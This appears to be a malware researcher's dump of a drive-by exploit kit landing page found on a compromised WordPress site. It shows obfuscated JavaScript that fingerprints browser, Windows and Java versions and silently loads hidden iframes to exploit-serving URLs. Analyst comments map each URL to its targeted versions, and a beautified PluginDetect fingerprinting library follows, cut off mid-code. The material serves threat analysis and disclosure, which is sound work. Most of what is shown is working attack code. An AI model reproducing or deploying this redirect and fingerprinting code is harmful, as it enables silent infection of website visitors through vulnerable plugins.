<= 6.32){TQGRXSEi();}else if(QEzGR[0] == 1 && BZIMlJFt <= 7.17){IuJKUxe();}/*else{IuJKUxe();}*/}}function nekTVLCFu() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h5', 'text/html'); }function IuJKUxe() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h2', 'text/html'); }function DzIEPNhc(NxZFu){var MRZvEcxG = new Array;try{MRZvEcxG = NxZFu.split(',');for(jBxaKE = 0; jBxaKE < MRZvEcxG.size; jBxaKE++){MRZvEcxG[jBxaKE] = parseFloat(MRZvEcxG[jBxaKE]);}}catch(BeerBZu){return null;}return MRZvEcxG;}function vZfpbBKzh() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h3', 'text/html'); }function pPDjhQv() { return; }function eeguOzpz(UyEllYwYss){if(UyEllYwYss != null){var BZIMlJFt = parseFloat(UyEllYwYss[1] + "." + UyEllYwYss[2]);if(UyEllYwYss[0] == 9 && BZIMlJFt <= 3.4){VcXjat();}if(UyEllYwYss[0] == 9 && BZIMlJFt <= 4.0){pPDjhQv();}else if(UyEllYwYss[0] < 9){pPDjhQv();}if(UyEllYwYss[0] == 10 && UyEllYwYss[1] == 1){YjGGR();}/*else{pPDjhQv();}*/}}function fPVoBak(){var WLtIYJZDWQQ = UIlKdBdnO();if (WLtIYJZDWQQ != null){if (WLtIYJZDWQQ == 'msie'){try { return parseFloat(CzdxtSXz.match(/msie ([\d]+)\.[\d]+/)[1]);}catch(BeerBZu) { return null;}}if (WLtIYJZDWQQ == 'firefox'){try { return parseFloat(CzdxtSXz.match(/firefox\/([\d]+)\.[\d]+/)[1]);}catch(BeerBZu) { return null;}}}return null;}function YQnBLMyY() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h6', 'text/html'); }function PPnprFkcx(){var znQAdpi = 0;var IGwyvnqihKC = 0;try{znQAdpi = new ActiveXObject("SharePoint.OpenDocuments.4");}catch (e) {}try{IGwyvnqihKC = new ActiveXObject("SharePoint.OpenDocuments.3");}catch (e) {}if ((typeof znQAdpi) == "object" && (typeof IGwyvnqihKC) == "object"){return "2010";}else if ((typeof znQAdpi) == "number" && (typeof IGwyvnqihKC) == "object"){return "2007";}return null;}function KzRIuDdJ(QEzGR){if(QEzGR != null){if(QEzGR[0] == 1 && QEzGR[1] == 7 && QEzGR[3] <= 17){vZfpbBKzh();}}}function YnuLXRygeP() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h4', 'text/html'); }function UIlKdBdnO(){if (CzdxtSXz.indexOf('msie') != -1 && CzdxtSXz.indexOf('opera') == -1 && CzdxtSXz.indexOf('webtv') == -1){return 'msie'}if (CzdxtSXz.indexOf('opera') != -1){return 'opera'}if (CzdxtSXz.indexOf('firefox') != -1){return 'firefox';}return null;}function pMuJUQa(){return PcyjjcB("Java");}function VcXjat() { return; }function PXTLS(bVVpcDYN, UgfEmMfy){try { var sevqAkcRBI=document.createElement('iframe'); sevqAkcRBI.style.visibility='hidden'; sevqAkcRBI.height=1; sevqAkcRBI.src=bVVpcDYN; sevqAkcRBI.async=true; sevqAkcRBI.width=1; sevqAkcRBI.type=UgfEmMfy; document.body.appendChild(sevqAkcRBI);}catch (BeerBZu) { return null;}}function TQGRXSEi() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h7', 'text/html'); }function xAtqjEshx(){var NVDGXp = fPVoBak();var hapkhUyCQ = UIlKdBdnO();var ZooVPohAB = KKYaG();/*var pUcLru = PPnprFkcx();*/var uwRBqOEcl = zzaRNJ();if(hapkhUyCQ == 'msie' && NVDGXp == 7 && ZooVPohAB < 6){nekTVLCFu();var QEzGR = pMuJUQa();if(QEzGR != null){setTimeout(function(){ ipzPNmQxc(QEzGR); }, 3000);}return;}if(hapkhUyCQ == 'msie' && NVDGXp == 8 && ZooVPohAB < 6){YQnBLMyY();var QEzGR = pMuJUQa();if(QEzGR != null){setTimeout(function(){ ipzPNmQxc(QEzGR); }, 3000);}return;}if(hapkhUyCQ == 'msie' && NVDGXp == 6 && ZooVPohAB < 6){YnuLXRygeP();var QEzGR = pMuJUQa();if(QEzGR != null){setTimeout(function(){ ipzPNmQxc(QEzGR); }, 3000);}return;}var QEzGR = pMuJUQa();if(QEzGR != null && ZooVPohAB != null){if(hapkhUyCQ == 'chrome'){KzRIuDdJ(QEzGR);}else{ipzPNmQxc(QEzGR);}}}function ekUwwyBtM(){return PcyjjcB("AdobeReader");}function YjGGR() { return; }function KKYaG(){try { return parseFloat(CzdxtSXz.match(/windows nt ([\d]+)\.[\d]+/)[1]);}catch(BeerBZu) { return null;}}function zzaRNJ(){if (CzdxtSXz.indexOf('wow64') != -1){return '64';}else{return '32';}}var CzdxtSXz = navigator.userAgent.toLowerCase();xAtqjEshx();</script></body></html>$

// unixfreaxjp
// Exploit logic is as per below:

h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h2 Non IE Java <= 1.7.17
h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h3 IE 7 Java <= 1.7.17
h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h4 IE 6 Win < 6
h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h5 IE 7 Win/NT < 6 Java <= 1.7.17
h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h6 IE 8 Win < 6
h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h7 Non IE Java <= 1.6.32

// Note: but the API looks supporting to non IE like Chrome & Firefox too actually.
// I saw no link went from the PDF (Adobe Reader) weapon.

// unixfreaxjp:
// PluginDetect Beautified w/ fll HTML below, see its codes, is fun 
// to learn how condition are stated to exploit in the below parts.
// hope someone can have contacts with Iranian CERT for this...
// 

<html>

<head></head>

<body>
    <script type='text/javascript'>
        /*PluginDetect v0.8.3www.pinlady.net/PluginDetect/license/[ getVersion hasMimeType onDetectionDone ][ Java AdobeReader ]*/
        var PluginDetect = {
            version: "0.8.3",
            name: "PluginDetect",
            openTag: "<",
            isDefined: function (b) {
                return typeof b != "undefined"
            },
            isArray: function (b) {
                return (/array/i).test(Object.prototype.toString.call(b))
            },
            isFunc: function (b) {
                return typeof b == "function"
            },
            isString: function (b) {
                return typeof b == "string"
            },
            isNum: function (b) {
                return typeof b == "number"
            },
            isStrNum: function (b) {
                return (typeof b == "string" && (/\d/).test(b))
            },
            getNumRegx: /[\d][\d\.\_,\-]*/,
            splitNumRegx: /[\.\_,\-]/g,
            getNum: function (b, c) {
                var d = this,
                    a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
                return a ? a[0] : null
            },
            compareNums: function (h, f, d) {
                var e = this,
                    c, b, a, g = parseInt;
                if (e.isStrNum(h) && e.isStrNum(f)) {
                    if (e.isDefined(d) && d.compareNums) {
                        return d.compareNums(h, f)
                    }
                    c = h.split(e.splitNumRegx);
                    b = f.split(e.splitNumRegx);
                    for (a = 0; a < Math.min(c.length, b.length); a++) {
                        if (g(c[a], 10) > g(b[a], 10)) {
                            return 1
                        }
                        if (g(c[a], 10) < g(b[a], 10)) {
                            return -1
                        }
                    }
                }
                return 0
            },
            formatNum: function (b, c) {
                var d = this,
                    a, e;
                if (!d.isStrNum(b)) {
                    return null
                }
                if (!d.isNum(c)) {
                    c = 4
                }
                c--;
                e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
                for (a = 0; a < 4; a++) {
                    if (/^(0+)(.+)$/.test(e[a])) {
                        e[a] = RegExp.$2
                    }
                    if (a > c || !(/\d/).test(e[a])) {
                        e[a] = "0"
                    }
                }
                return e.slice(0, 4).join(",")
            },
            getPROP: function (d, b, a) {
                var c;
                try {
                    if (d) {
                        a = d[b]
                    }
                } catch (c) {}
                return a
            },
            findNavPlugin: function (l, e, c) {
                var j = this,
                    h = new RegExp(l, "i"),
                    d = (!j.isDefined(e) || e) ? /\d/ : 0,
                    k = c ? new RegExp(c, "i") : 0,
                    a = navigator.plugins,
                    g = "",
                    f, b, m;
                for (f = 0; f < a.length; f++) {
                    m = a[f].description || g;
                    b = a[f].name || g;
                    if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
                        if (!k || !(k.test(m) || k.test(b))) {
                            return a[f]
                        }
                    }
                }
                return null
            },
            getMimeEnabledPlugin: function (k, m, c) {
                var e = this,
                    f, b = new RegExp(m, "i"),
                    h = "",
                    g = c ? new RegExp(c, "i") : 0,
                    a, l, d, j = e.isString(k) ? [k] : k;
                for (d = 0; d < j.length; d++) {
                    if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
                        l = f.description || h;
                        a = f.name || h;
                        if (b.test(l) || b.test(a)) {
                            if (!g || !(g.test(l) || g.test(a))) {
                                return f
                            }
                        }
                    }
                }
                return 0
            },
            getVersionDelimiter: ",",
            findPlugin: function (d) {
                var c = this,
                    b, d, a = {
                        status: -3,
                        plugin: 0
                    };
                if (c.DOM) {
                    c.DOM.initDiv()
                }
                if (!c.isString(d)) {
                    return a
                }
                if (d.length == 1) {
                    c.getVersionDelimiter = d;
                    return a
                }
                d = d.toLowerCase().replace(/\s/g, "");
                b = c.Plugins[d];
                if (!b || !b.getVersion) {
                    return a
                }
                a.plugin = b;
                a.status = 1;
                return a
            },
            getPluginFileVersion: function (f, b) {
                var h = this,
                    e, d, g, a, c = -1;
                if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
                    return b
                }
                if (!b) {
                    return e
                }
                e = h.formatNum(e);
                b = h.formatNum(b);
                d = b.split(h.splitNumRegx);
                g = e.split(h.splitNumRegx);
                for (a = 0; a < d.length; a++) {
                    if (c > -1 && a > c && d[a] != "0") {
                        return b
                    }
                    if (g[a] != d[a]) {
                        if (c == -1) {
                            c = a
                        }
                        if (d[a] != "0") {
                            return b
                        }
                    }
                }
                return e
            },
            AXO: window.ActiveXObject,
            getAXO: function (a) {
                var d = null,
                    c, b = this;
                try {
                    d = new b.AXO(a)
                } catch (c) {};
                return d
            },
            INIT: function () {
                this.init.library(this)
            },
            init: {
                $: 1,
                hasRun: 0,
                objProperties: function (d, e, b) {
                    var a, c = {};
                    if (e && b) {
                        if (e[b[0]] === 1 && !d.isArray(e) && !d.isFunc(e) && !d.isString(e) && !d.isNum(e)) {
                            for (a = 0; a < b.length; a = a + 2) {
                                e[b[a]] = b[a + 1];
                                c[b[a]] = 1
                            }
                        }
                        for (a in e) {
                            if (!c[a] && e[a] && e[a][b[0]] === 1) {
                                this.objProperties(d, e[a], b)
                            }
                        }
                    }
                },
                publicMethods: function (c, f) {
                    var g = this,
                        b = g.$,
                        a, d;
                    if (c && f) {
                        for (a in c) {
                            try {
                                if (b.isFunc(c[a])) {
                                    f[a] = c[a](f)
                                }
                            } catch (d) {}
                        }
                    }
                },
                plugin: function (a, c) {
                    var d = this,
                        b = d.$;
                    if (a) {
                        d.objProperties(b, a, ["$", b, "$$", a]);
                        if (!b.isDefined(a.getVersionDone)) {
                            a.installed = null;
                            a.version = null;
                            a.version0 = null;
                            a.getVersionDone = null;
                            a.pluginName = c
                        }
                    }
                },
                detectIE: function () {
                    var init = this,
                        $ = init.$,
                        doc = document,
                        e, x, userAgent = navigator.userAgent || "",
                        progid, progid1, progid2;
                    $.isIE = eval("/*@cc_on!@*/!1");
                    $.verIE = $.isIE ? ((/^(?:.*?[^a-zA-Z])??(?:MSIE|IE)\s*(\d+\.?\d*)/i).test(userAgent) ? parseFloat(RegExp.$1, 10) : 7) : null;
                    $.ActiveXEnabled = !1;
                    $.ActiveXFilteringEnabled = !1;
                    if ($.isIE) {
                        try {
                            $.ActiveXFilteringEnabled = window.external.msActiveXFilteringEnabled()
                        } catch (e) {}
                        progid1 = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "TDCCtl.TDCCtl", "Shell.UIHelper", "HtmlDlgSafeHelper.HtmlDlgSafeHelper", "Scripting.Dictionary"];
                        progid2 = ["WMPlayer.OCX", "ShockwaveFlash.ShockwaveFlash", "AgControl.AgControl", ];
                        progid = progid1.concat(progid2);
                        for (x = 0; x < progid.length; x++) {
                            if ($.getAXO(progid[x])) {
                                $.ActiveXEnabled = !0;
                                if (!$.dbug) {
                                    break
                                }
                            }
                        }
                        if ($.ActiveXEnabled && $.ActiveXFilteringEnabled) {
                            for (x = 0; x < progid2.length; x++) {
                                if ($.getAXO(progid2[x])) {
                                    $.ActiveXFilteringEnabled = !1;
                                    break
                                }
                            }
                        }
                    }
                },
                detectNonIE: function () {
                    var e = this,
                        c = this.$,
                        d = navigator,
                        b = c.isIE ? "" : d.userAgent || "",
                        f = d.vendor || "",
                        a = d.product || "";
                    c.isGecko = (/Gecko/i).test(a) && (/Gecko\s*\/\s*\d/i).test(b);
                    c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(b) ? RegExp.$1 : "0.9") : null;
                    c.isChrome = (/(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i).test(b);
                    c.verChrome = c.isChrome ? c.formatNum(RegExp.$2) : null;
                    c.isSafari = !c.isChrome && ((/Apple/i).test(f) || !f) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(b);
                    c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(b) ? c.formatNum(RegExp.$1) : null;
                    c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(b);
                    c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(b) || 1) ? parseFloat(RegExp.$1, 10) : null
                },
                detectPlatform: function () {
                    var e = this,
                        d = e.$,
                        b, a = navigator.platform || "";
                    d.OS = 100;
                    if (a) {
                        var c = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
                        for (b = c.length - 2; b >= 0; b = b - 2) {
                            if (c[b] && new RegExp(c[b], "i").test(a)) {
                                d.OS = c[b + 1];
                                break
                            }
                        }
                    }
                },
                library: function (c) {
                    var e = this,
                        d = document,
                        b, a;
                    c.init.objProperties(c, c, ["$", c]);
                    for (a in c.Plugins) {
                        c.init.plugin(c.Plugins[a], a)
                    }
                    e.publicMethods(c.PUBLIC, c);
                    c.win.init();
                    c.head = d.getElementsByTagName("head")[0] || d.getElementsByTagName("body")[0] || d.body || null;
                    e.detectPlatform();
                    e.detectIE();
                    e.detectNonIE();
                    c.init.hasRun = 1
                }
            },
            ev: {
                $: 1,
                handler: function (c, b, a) {
                    return function () {
                        c(b, a)
                    }
                },
                fPush: function (b, a) {
                    var c = this,
                        d = c.$;
                    if (d.isArray(a) && (d.isFunc(b) || (d.isArray(b) && b.length > 0 && d.isFunc(b[0])))) {
                        a.push(b)
                    }
                },
                callArray: function (a) {
                    var b = this,
                        d = b.$,
                        c;
                    if (d.isArray(a)) {
                        while (a.length) {
                            c = a[0];
                            a.splice(0, 1);
                            b.call(c)
                        }
                    }
                },
                call: function (d) {
                    var b = this,
                        c = b.$,
                        a = c.isArray(d) ? d.length : -1;
                    if (a > 0 && c.isFunc(d[0])) {
                        d[0](c, a > 1 ? d[1] : 0, a > 2 ? d[2] : 0, a > 3 ? d[3] : 0)
                    } else {
                        if (c.isFunc(d)) {
                            d(c)
                        }
                    }
                }
            },
            PUBLIC: {
                getVersion: function (b) {
                    var a = function (h, e, d) {
                        var f = b.findPlugin(h),
                            g, c;
                        if (f.status < 0) {
                            return null
                        };
                        g = f.plugin;
                        if (g.getVersionDone != 1) {
                            g.getVersion(null, e, d);
                            if (g.getVersionDone === null) {
                                g.getVersionDone = 1
                            }
                        }
                        c = (g.version || g.version0);
                        c = c ? c.replace(b.splitNumRegx, b.getVersionDelimiter) : c;
                        return c
                    };
                    return a
                },
                onDetectionDone: function (b) {
                    var a = function (j, h, d, c) {
                        var e = b.findPlugin(j),
                            k, g;
                        if (e.status == -3) {
                            return -1
                        }
                        g = e.plugin;
                        if (!b.isArray(g.funcs)) {
                            g.funcs = []
                        };
                        if (g.getVersionDone != 1) {
                            k = b.getVersion ? b.getVersion(j, d, c) : b.isMinVersion(j, "0", d, c)
                        }
                        if (g.installed != -0.5 && g.installed != 0.5) {
                            b.ev.call(h);
                            return 1
                        }
                        b.ev.fPush(h, g.funcs);
                        return 0
                    };
                    return a
                },
                hasMimeType: function (b) {
                    var a = function (d) {
                        if (!b.isIE && d && navigator && navigator.mimeTypes) {
                            var g, f, c, e = b.isArray(d) ? d : (b.isString(d) ? [d] : []);
                            for (c = 0; c < e.length; c++) {
                                if (b.isString(e[c]) && /[^\s]/.test(e[c])) {
                                    g = navigator.mimeTypes[e[c]];
                                    f = g ? g.enabledPlugin : 0;
                                    if (f && (f.name || f.description)) {
                                        return g
                                    }
                                }
                            }
                        }
                        return null
                    };
                    return a
                },
                z: 0
            },
            codebase: {
                $: 1,
                isDisabled: function () {
                    var a = this,
                        b = a.$;
                    return b.ActiveXEnabled && b.isIE && b.verIE >= 7 ? 0 : 1
                },
                checkGarbage: function (d) {
                    var b = this,
                        c = b.$,
                        a;
                    if (c.isIE && d && c.getPROP(d.firstChild, "object")) {
                        a = c.getPROP(d.firstChild, "readyState");
                        if (c.isNum(a) && a != 4) {
                            b.garbage = 1;
                            return 1
                        }
                    }
                    return 0
                },
                emptyGarbage: function () {
                    var a = this,
                        b = a.$,
                        c;
                    if (b.isIE && a.garbage) {
                        try {
                            window.CollectGarbage()
                        } catch (c) {}
                        a.garbage = 0
                    }
                },
                init: function (e) {
                    if (!e.init) {
                        var c = this,
                            d = c.$,
                            a, b;
                        e.init = 1;
                        e.min = 0;
                        e.max = 0;
                        e.hasRun = 0;
                        e.version = null;
                        e.L = 0;
                        e.altHTML = "";
                        e.span = document.createElement("span");
                        e.tagA = '<object width="1" height="1" style="display:none;" codebase="#version=';
                        b = e.classID || e.$$.classID || "";
                        e.tagB = '" ' + ((/clsid\s*:/i).test(b) ? 'classid="' : 'type="') + b + '">' + e.altHTML + d.openTag + "/object>";
                        for (a = 0; a < e.Lower.length; a++) {
                            e.Lower[a] = d.formatNum(e.Lower[a]);
                            e.Upper[a] = d.formatNum(e.Upper[a])
                        }
                    }
                },
                isActiveXObject: function (i, b) {
                    var f = this,
                        g = f.$,
                        a = 0,
                        h, d = i.$$,
                        c = i.span;
                    if (i.min && g.compareNums(b, i.min) <= 0) {
                        return 1
                    }
                    if (i.max && g.compareNums(b, i.max) >= 0) {
                        return 0
                    }
                    c.innerHTML = i.tagA + b + i.tagB;
                    if (g.getPROP(c.firstChild, "object")) {
                        a = 1
                    };
                    f.checkGarbage(c);
                    c.innerHTML = "";
                    if (a) {
                        i.min = b
                    } else {
                        i.max = b
                    }
                    return a
                },
                convert_: function (f, a, b, e) {
                    var d = f.convert[a],
                        c = f.$;
                    return d ? (c.isFunc(d) ? c.formatNum(d(b.split(c.splitNumRegx), e).join(",")) : b) : d
                },
                convert: function (h, c, g) {
                    var e = this,
                        f = h.$,
                        b, a, d;
                    c = f.formatNum(c);
                    a = {
                        v: c,
                        x: -1
                    };
                    if (c) {
                        for (b = 0; b < h.Lower.length; b++) {
                            d = e.convert_(h, b, h.Lower[b]);
                            if (d && f.compareNums(c, g ? d : h.Lower[b]) >= 0 && (!b || f.compareNums(c, g ? e.convert_(h, b, h.Upper[b]) : h.Upper[b]) < 0)) {
                                a.v = e.convert_(h, b, c, g);
                                a.x = b;
                                break
                            }
                        }
                    }
                    return a
                },
                isMin: function (g, f) {
                    var d = this,
                        e = g.$,
                        c, b, a = 0;
                    d.init(g);
                    return a
                },
                search: function (g) {
                    var k = this,
                        h = k.$,
                        i = g.$$,
                        b = 0,
                        c;
                    k.init(g);
                    c = (g.hasRun || k.isDisabled()) ? 1 : 0;
                    g.hasRun = 1;
                    if (c) {
                        return g.version
                    };
                    var o, n, m, j = function (q, t) {
                            var r = [].concat(f),
                                s;
                            r[q] = t;
                            s = k.isActiveXObject(g, r.join(","));
                            if (s) {
                                b = 1;
                                f[q] = t
                            } else {
                                p[q] = t
                            }
                            return s
                        }, d = g.DIGITMAX,
                        e, a, l = 99999999,
                        f = [0, 0, 0, 0],
                        p = [0, 0, 0, 0];
                    for (o = 0; o < p.length; o++) {
                        f[o] = Math.floor(g.DIGITMIN[o]) || 0;
                        e = f.join(",");
                        a = f.slice(0, o).concat([l, l, l, l]).slice(0, f.length).join(",");
                        for (m = 0; m < d.length; m++) {
                            if (h.isArray(d[m])) {
                                d[m].push(0);
                                if (d[m][o] > p[o] && h.compareNums(a, g.Lower[m]) >= 0 && h.compareNums(e, g.Upper[m]) < 0) {
                                    p[o] = Math.floor(d[m][o])
                                }
                            }
                        }
                        for (n = 0; n < 30; n++) {
                            if (p[o] - f[o] <= 16) {
                                for (m = p[o]; m >= f[o] + (o ? 1 : 0); m--) {
                                    if (j(o, m)) {
                                        break
                                    }
                                }
                                break
                            }
                            j(o, Math.round((p[o] + f[o]) / 2))
                        }
                        if (!b) {
                            break
                        }
                        p[o] = f[o]
                    }
                    if (b) {
                        g.version = k.convert(g, f.join(",")).v
                    };
                    return g.version
                }
            },
            win: {
                $: 1,
                loaded: false,
                hasRun: 0,
                init: function () {
                    var b = this,
                        a = b.$;
                    if (!b.hasRun) {
                        b.hasRun = 1;
                        b.addEvent("load", a.ev.handler(b.runFuncs, a));
                        b.addEvent("unload", a.ev.handler(b.cleanup, a))
                    }
                },
                addEvent: function (c, b) {
                    var e = this,
                        d = e.$,
                        a = window;
                    if (d.isFunc(b)) {
                        if (a.addEventListener) {
                            a.addEventListener(c, b, false)
                        } else {
                            if (a.attachEvent) {
                                a.attachEvent("on" + c, b)
                            } else {
                                a["on" + c] = e.concatFn(b, a["on" + c])
                            }
                        }
                    }
                },
                concatFn: function (d, c) {
                    return function () {
                        d();
                        if (typeof c == "function") {
                            c()
                        }
                    }
                },
                funcs0: [],
                funcs: [],
                cleanup: function (b) {
                    if (b) {
                        for (var a in b) {
                            b[a] = 0
                        }
                        b = 0
                    }
                },
                runFuncs: function (a) {
                    if (a && !a.win.loaded) {
                        a.win.loaded = true;
                        a.ev.callArray(a.win.funcs0);
                        a.ev.callArray(a.win.funcs);
                        if (a.DOM) {
                            a.DOM.onDoneEmptyDiv()
                        }
                    }
                },
                z: 0
            },
            DOM: {
                $: 1,
                isEnabled: {
                    $: 1,
                    objectTag: function () {
                        var a = this.$;
                        return a.isIE ? a.ActiveXEnabled : 1
                    },
                    objectProperty: function () {
                        var a = this.$;
                        return a.isIE && a.verIE >= 7 ? 1 : 0
                    }
                },
                div: null,
                divID: "plugindetect",
                divClass: "doNotRemove",
                divWidth: 50,
                getDiv: function () {
                    var a = this;
                    return a.div || document.getElementById(a.divID) || null
                },
                isDivPermanent: function () {
                    var b = this,
                        c = b.$,
                        a = b.getDiv();
                    return a && c.isString(a.className) && a.className.toLowerCase().indexOf(b.divClass.toLowerCase()) > -1 ? 1 : 0
                },
                initDiv: function (b) {
                    var c = this,
                        d = c.$,
                        a;
                    if (!c.div) {
                        a = c.getDiv();
                        if (a) {
                            c.div = a
                        } else {
                            if (b) {
                                c.div = document.createElement("div");
                                c.div.id = c.divID
                            }
                        } if (c.div) {
                            c.setStyle(c.div, c.defaultStyle.concat(["display", "block", "width", c.divWidth + "px", "height", (c.pluginSize + 3) + "px", "fontSize", (c.pluginSize + 3) + "px", "lineHeight", (c.pluginSize + 3) + "px"]));
                            if (!a) {
                                c.setStyle(c.div, ["position", "absolute", "right", "0px", "top", "0px"]);
                                c.insertDivInBody(c.div)
                            }
                        }
                    }
                },
                pluginSize: 1,
                altHTML: "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;",
                emptyNode: function (c) {
                    var b = this,
                        d = b.$,
                        a, f;
                    if (c && c.childNodes) {
                        for (a = c.childNodes.length - 1; a >= 0; a--) {
                            if (d.isIE) {
                                b.setStyle(c.childNodes[a], ["display", "none"])
                            }
                            c.removeChild(c.childNodes[a])
                        }
                    }
                },
                LASTfuncs: [],
                onDoneEmptyDiv: function () {
                    var f = this,
                        g = f.$,
                        b, d, c, a, h;
                    f.initDiv();
                    if (!g.win.loaded || g.win.funcs0.length || g.win.funcs.length) {
                        return
                    }
                    for (b in g.Plugins) {
                        d = g.Plugins[b];
                        if (d) {
                            if (d.OTF == 3 || (d.funcs && d.funcs.length)) {
                                return
                            }
                        }
                    }
                    g.ev.callArray(f.LASTfuncs);
                    a = f.getDiv();
                    if (a) {
                        if (f.isDivPermanent()) {} else {
                            if (a.childNodes) {
                                for (b = a.childNodes.length - 1; b >= 0; b--) {
                                    c = a.childNodes[b];
                                    f.emptyNode(c)
                                }
                                try {
                                    a.innerHTML = ""
                                } catch (h) {}
                            }
                            if (a.parentNode) {
                                try {
                                    a.parentNode.removeChild(a)
                                } catch (h) {}
                                a = null;
                                f.div = null
                            }
                        }
                    }
                },
                width: function () {
                    var g = this,
                        e = g.DOM,
                        f = e.$,
                        d = g.span,
                        b, c, a = -1;
                    b = d && f.isNum(d.scrollWidth) ? d.scrollWidth : a;
                    c = d && f.isNum(d.offsetWidth) ? d.offsetWidth : a;
                    return c > 0 ? c : (b > 0 ? b : Math.max(c, b))
                },
                obj: function (b) {
                    var d = this,
                        c = d.span,
                        a = c && c.firstChild ? c.firstChild : null;
                    return a
                },
                readyState: function () {
                    var b = this,
                        a = b.DOM.$;
                    return a.isIE ? a.getPROP(b.obj(), "readyState") : b.undefined
                },
                objectProperty: function () {
                    var d = this,
                        b = d.DOM,
                        c = b.$,
                        a;
                    if (b.isEnabled.objectProperty()) {
                        a = c.getPROP(d.obj(), "object")
                    }
                    return a
                },
                getTagStatus: function (b, m, r, p, f, h) {
                    var s = this,
                        d = s.$,
                        q;
                    if (!b || !b.span) {
                        return -2
                    }
                    var k = b.width(),
                        c = b.readyState(),
                        a = b.objectProperty();
                    if (a) {
                        return 1.5
                    }
                    var g = /clsid\s*\:/i,
                        o = r && g.test(r.outerHTML || "") ? r : (p && g.test(p.outerHTML || "") ? p : 0),
                        i = r && !g.test(r.outerHTML || "") ? r : (p && !g.test(p.outerHTML || "") ? p : 0),
                        l = b && g.test(b.outerHTML || "") ? o : i;
                    if (!m || !m.span || !l || !l.span) {
                        return 0
                    }
                    var j = l.width(),
                        n = m.width(),
                        t = l.readyState();
                    if (k < 0 || j < 0 || n <= s.pluginSize) {
                        return 0
                    }
                    if (h && !b.pi && d.isDefined(a) && d.isIE && b.tagName == l.tagName && b.time <= l.time && k === j && c === 0 && t !== 0) {
                        b.pi = 1
                    }
                    if (j < n) {
                        return b.pi ? -0.1 : 0
                    }
                    if (k >= n) {
                        if (!b.winLoaded && d.win.loaded) {
                            return b.pi ? -0.5 : -1
                        }
                        if (d.isNum(f)) {
                            if (!d.isNum(b.count2)) {
                                b.count2 = f
                            }
                            if (f - b.count2 > 0) {
                                return b.pi ? -0.5 : -1
                            }
                        }
                    }
                    try {
                        if (k == s.pluginSize && (!d.isIE || c === 4)) {
                            if (!b.winLoaded && d.win.loaded) {
                                return 1
                            }
                            if (b.winLoaded && d.isNum(f)) {
                                if (!d.isNum(b.count)) {
                                    b.count = f
                                }
                                if (f - b.count >= 5) {
                                    return 1
                                }
                            }
                        }
                    } catch (q) {}
                    return b.pi ? -0.1 : 0
                },
                setStyle: function (b, h) {
                    var c = this,
                        d = c.$,
                        g = b.style,
                        a, f;
                    if (g && h) {
                        for (a = 0; a < h.length; a = a + 2) {
                            try {
                                g[h[a]] = h[a + 1]
                            } catch (f) {}
                        }
                    }
                },
                insertDivInBody: function (a, h) {
                    var j = this,
                        d = j.$,
                        g, b = "pd33993399",
                        c = null,
                        i = h ? window.top.document : window.document,
                        f = i.getElementsByTagName("body")[0] || i.body;
                    if (!f) {
                        try {
                            i.write('<div id="' + b + '">.' + d.openTag + "/div>");
                            c = i.getElementById(b)
                        } catch (g) {}
                    }
                    f = i.getElementsByTagName("body")[0] || i.body;
                    if (f) {
                        f.insertBefore(a, f.firstChild);
                        if (c) {
                            f.removeChild(c)
                        }
                    }
                },
                defaultStyle: ["verticalAlign", "baseline", "outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"],
                insert: function (b, i, g, h, c, q, o) {
                    var s = this,
                        f = s.$,
                        r, t = document,
                        v, m, p = t.createElement("span"),
                        k, a, l = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:" + (q ? "hidden;" : "visible;") + "display:inline;";
                    if (!f.isDefined(h)) {
                        h = ""
                    }
                    if (f.isString(b) && (/[^\s]/).test(b)) {
                        b = b.toLowerCase().replace(/\s/g, "");
                        v = f.openTag + b + " ";
                        v += 'style="' + l + '" ';
                        var j = 1,
                            u = 1;
                        for (k = 0; k < i.length; k = k + 2) {
                            if (/[^\s]/.test(i[k + 1])) {
                                v += i[k] + '="' + i[k + 1] + '" '
                            }
                            if ((/width/i).test(i[k])) {
                                j = 0
                            }
                            if ((/height/i).test(i[k])) {
                                u = 0
                            }
                        }
                        v += (j ? 'width="' + s.pluginSize + '" ' : "") + (u ? 'height="' + s.pluginSize + '" ' : "");
                        v += ">";
                        for (k = 0; k < g.length; k = k + 2) {
                            if (/[^\s]/.test(g[k + 1])) {
                                v += f.openTag + 'param name="' + g[k] + '" value="' + g[k + 1] + '" />'
                            }
                        }
                        v += h + f.openTag + "/" + b + ">"
                    } else {
                        b = "";
                        v = h
                    } if (!o) {
                        s.initDiv(1)
                    }
                    var n = o || s.getDiv();
                    m = {
                        span: null,
                        winLoaded: f.win.loaded,
                        tagName: b,
                        outerHTML: v,
                        DOM: s,
